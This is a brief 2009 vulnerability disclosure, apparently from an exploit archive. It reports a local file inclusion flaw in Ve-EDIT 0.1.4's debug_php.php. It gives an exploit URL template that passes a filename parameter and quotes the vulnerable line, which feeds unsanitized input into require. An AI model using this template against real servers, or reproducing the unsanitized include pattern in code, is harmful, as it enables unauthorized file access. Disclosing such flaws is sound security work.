Ve-EDIT 0.1.4 (debug_php.php) Local File Inclusion Vulnerability

2009-09-01 00:14:36

-------------------------------------------------------------------------------------
Ve-EDIT v 0.1.4 (debug_php.php) LFI Vulnerability
-------------------------------------------------------------------------------------

Author: CoBRa_21

Mail: uyku_cu[at]windowslive[dot]com

Script Download: http://sourceforge.net/projects/phpwebeditor/

-------------------------------------------------------------------------------------

EXPLOİT:

http://localhost/[PATH]/debugger/debug_php.php?_GET[filename]= [LFİ]

-------------------------------------------------------------------------------------

BUG
Line 53: require("./../".$_GET["filename"]);

-------------------------------------------------------------------------------------

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.